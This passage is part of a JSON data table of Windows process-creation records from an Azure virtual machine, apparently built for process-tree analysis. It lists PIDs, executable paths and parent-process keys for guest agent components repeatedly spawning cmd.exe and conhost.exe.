0x834\",\"PID: 0x17c4\",\"PID: 0x88c\",\"PID: 0x2e4\",\"PID: 0x108c\",\"PID: 0x1360\",\"PID: 0x19f4\",\"PID: 0x19f0\",\"PID: 0x1570\",\"PID: 0x17a8\",\"PID: 0x1058\",\"PID: 0x82c\",\"PID: 0xd44\",\"PID: 0x1bfc\",\"PID: 0x1998\",\"PID: 0x1c10\",\"PID: 0x1184\",\"PID: 0xc6c\",\"PID: 0x454\",\"PID: 0x65c\",\"PID: 0xe1c\",\"PID: 0x1070\",\"PID: 0x1ce8\",\"PID: 0xb10\",\"PID: 0x2260\",\"PID: 0x1c54\",\"PID: 0x181c\",\"PID: 0x8c0\",\"PID: 0x1f60\",\"PID: 0x123c\",\"PID: 0x518\",\"PID: 0xc98\",\"PID: 0x1cdc\",\"PID: 0x1484\",\"PID: 0xb14\",\"PID: 0x16bc\",\"PID: 0x1bb4\",\"PID: 0x1be4\",\"PID: 0xec4\",\"PID: 0xd68\",\"PID: 0xb64\",\"PID: 0x1eb4\",\"PID: 0xc98\",\"PID: 0x6f8\",\"PID: 0x84c\",\"PID: 0x1d6c\",\"PID: 0x490\",\"PID: 0x16d4\",\"PID: 0xa2c\",\"PID: 0x65c\",\"PID: 0x12fc\",\"PID: 0xd78\",\"PID: 0x221c\",\"PID: 0x1238\",\"PID: 0x1584\"],\"__proc_name$$\":[\"WaAppAgent.exe\",\"CollectGuestLogs.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"WaSecAgentProv.exe\",\"conhost.exe\",\"CollectGuestLogs.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"CollectGuestLogs.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"CollectGuestLogs.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"CollectGuestLogs.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"CollectGuestLogs.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"CollectGuestLogs.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"WaSecAgentProv.exe\",\"conhost.exe\",\"CollectGuestLogs.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"CollectGuestLogs.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"CollectGuestLogs.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"CollectGuestLogs.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"CollectGuestLogs.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"CollectGuestLogs.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"WaSecAgentProv.exe\",\"conhost.exe\",\"CollectGuestLogs.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"CollectGuestLogs.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"CollectGuestLogs.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"CollectGuestLogs.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\"],\"index\":[75,74,73,72,71,70,69,68,67,66,65,64,63,62,61,60,59,58,57,56,55,54,53,52,51,50,49,48,47,46,45,44,43,42,41,40,39,38,37,36,35,34,33,32,31,30,29,28,27,26,25,24,23,22,21,20,19,18,17,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1],\"new_process_lc\":[\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\"],\"new_process_lc_par\":[\"NaN\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\"],\"parent_index\":[\"NaN\",\"1007\",\"103\",\"103\",\"105\",\"1007\",\"123\",\"1007\",\"134\",\"134\",\"136\",\"1007\",\"343\",\"343\",\"349\",\"1007\",\"364\",\"364\",\"366\",\"1007\",\"385\",\"385\",\"387\",\"1007\",\"502\",\"502\",\"504\",\"1007\",\"520\",\"520\",\"526\",\"1007\",\"530\",\"1007\",\"594\",\"594\",\"620\",\"1007\",\"640\",\"640\",\"642\",\"1007\",\"655\",\"655\",\"657\",\"1007\",\"69\",\"69\",\"74\",\"1007\",\"756\",\"756\",\"758\",\"1007\",\"771\",\"771\",\"773\",\"1007\",\"788\",\"1007\",\"791\",\"791\",\"793\",\"1007\",\"889\",\"889\",\"895\",\"1007\",\"910\",\"910\",\"912\",\"1007\",\"926\",\"926\",\"928\"],\"parent_key\":[\"NaN\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe|0x1994|1970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x123c|2019-02-09 23:16:28.153000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x123c|2019-02-09 23:16:28.153000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xccc|2019-02-09 23:20:15.547000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe|0x1994|1970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe|0xda8|2019-02-09 23:55:46.057000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe|0x1994|1970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x7fc|2019-02-10 00:22:33.813000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x7fc|2019-02-10 00:22:33.813000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x798|2019-02-10 00:26:22.213000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe|0x1994|1970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x172c|2019-02-10 01:27:25.173000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x172c|2019-02-10 01:27:25.173000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe2c|2019-02-10 01:31:14.010000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe|0x1994|1970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0xb14|2019-02-10 02:31:30.377000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0xb14|2019-02-10 02:31:30.377000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1898|2019-02-10 02:35:21.217000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe|0x1994|1970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0xe1c|2019-02-10 03:35:37.273000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0xe1c|2019-02-10 03:35:37.273000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x17c4|2019-02-10 03:39:26.323000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe|0x1994|1970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x2e4|2019-02-10 04:39:41.880000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x2e4|2019-02-10 04:39:41.880000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1360|2019-02-10 04:43:32.697000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe|0x1994|1970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x19f0|2019-02-10 05:43:48.783000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x19f0|2019-02-10 05:43:48.783000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x17a8|2019-02-10 05:47:40.657000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe|0x1994|1970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe|0x82c|2019-02-10 05:55:52.110000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe|0x1994|1970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x1bfc|2019-02-10 06:47:56.813000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x1bfc|2019-02-10 06:47:56.813000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1c10|2019-02-10 06:51:50.063000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe|0x1994|1970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0xc6c|2019-02-10 07:52:06.713000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0xc6c|2019-02-10 07:52:06.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x65c|2019-02-10 07:56:00.233000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe|0x1994|1970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x1070|2019-02-10 08:56:16.593000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x1070|2019-02-10 08:56:16.593000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xb10|2019-02-10 09:00:10.517000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe|0x1994|1970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x1c54|2019-02-09 22:11:59.877000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x1c54|2019-02-09 22:11:59.877000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x8c0|2019-02-09 22:16:24.523000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe|0x1994|1970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x123c|2019-02-10 10:00:27.043000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x123c|2019-02-10 10:00:27.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xc98|2019-02-10 10:04:18.733000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe|0x1994|1970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x1484|2019-02-10 11:04:35.127000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x1484|2019-02-10 11:04:35.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x16bc|2019-02-10 11:08:29.550000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe|0x1994|1970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe|0x1be4|2019-02-10 11:55:57.567000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe|0x1994|1970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0xd68|2019-02-10 12:08:46.173000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0xd68|2019-02-10 12:08:46.173000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1eb4|2019-02-10 12:12:35.877000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe|0x1994|1970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x6f8|2019-02-10 13:12:52.733000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x6f8|2019-02-10 13:12:52.733000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1d6c|2019-02-10 13:16:43.013000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe|0x1994|1970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x16d4|2019-02-10 14:16:59.427000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x16d4|2019-02-10 14:16:59.427000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x65c|2019-02-10 14:20:50.820000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe|0x1994|1970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0xd78|2019-02-10 15:21:06.890000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0xd78|2019-02-10 15:21:06.890000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1238|2019-02-10 15:24:56.040000\"],\"parent_proc_lc\":[\"NaN\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"